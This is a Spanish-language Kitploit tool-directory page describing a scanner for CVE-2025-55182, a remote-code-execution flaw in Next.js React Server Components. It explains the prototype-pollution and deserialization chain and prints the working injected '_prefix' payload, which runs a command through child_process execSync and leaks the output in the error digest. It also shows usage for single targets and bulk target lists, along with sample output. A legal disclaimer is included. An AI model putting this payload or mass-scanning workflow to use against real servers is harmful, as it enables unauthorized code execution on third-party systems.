Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Scanner — Escáner de seguridad para CVE-2025-55182 - Vulnerabilidad crítica de RCE en React Server Components | Kitploit
Herramientas/GitHubGitHub/f0xyx/cve-2025-55182-scanner
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

Escáner de seguridad para CVE-2025-55182 - Vulnerabilidad crítica de RCE en React Server Components

Ver Repositorio
1hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE‑2025‑55182 – Escáner de RCE por Deserialización RSC en Next.js

Esta herramienta verifica si un objetivo es vulnerable a CVE‑2025‑55182, un fallo de Ejecución Remota de Código causado por el manejo inseguro de cargas útiles de modelo RSC (React Server Components) dentro de Next.js.
La vulnerabilidad encadena Contaminación de Prototipo → Abuso de Deserialización → Ejecución de JavaScript del Lado del Servidor.

Aviso legal: Solo use esto en sistemas que posea legalmente o para los que tenga autorización explícita. Probar sin autorización = delito, colega.


🔥 Cómo Funciona Esta Vulnerabilidad

Next.js procesa internamente objetos “model” especiales enviados mediante multipart/form-data.
Si un atacante inyecta una estructura maliciosa como un thenable falsificado, puede envenenar:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • y otros internos

Esto lleva al servidor a evaluar JavaScript controlado por el atacante, resultando en RCE completo.


📌 Qué Hace Este Script

  • Acepta una sola URL (-u) o una lista de objetivos (-l)
  • Envía una carga útil de deserialización multipart manipulada
  • Extrae la salida del comando (id) del digest de error del servidor
  • Guarda los hosts vulnerables en foxvuln.txt

▶ Uso

URL Única

root@kitploit:~
python3 main.py -u https://target.com

Modo Lista

root@kitploit:~
python3 main.py -l list.txt

📦 Resumen de la Carga Útil

La carga útil abusa de process.mainModule.require('child_process').execSync() a través del _prefix inyectado:

root@kitploit:~
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

Esto fuerza al servidor a ejecutar id y filtrar el resultado dentro del digest lanzado (porque los errores RSC devuelven intencionadamente un campo “digest” estructurado).


🧪 Salida de Ejemplo

Objetivo vulnerable:

root@kitploit:~
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)

No vulnerable:

root@kitploit:~
[+] Testing: https://secure.com
[NOT VULN]

🗂 Archivo de Salida

Todas las URLs confirmadas como vulnerables se guardan en:

root@kitploit:~
foxvuln.txt

Formato:

root@kitploit:~
https://victim.com => uid=1000(www-data)

🧠 Notas

  • Funciona solo en endpoints que procesan cargas útiles de streaming RSC de Next.js
  • No fuerza bruta rutas — asume que el host procesa el POST en /
  • El tiempo de espera está configurado en 10s por host
  • Totalmente seguro para entornos de laboratorio — pero no ejecutes esto en servidores aleatorios a menos que quieras cometer un delito en tiempo récord

Descargar herramienta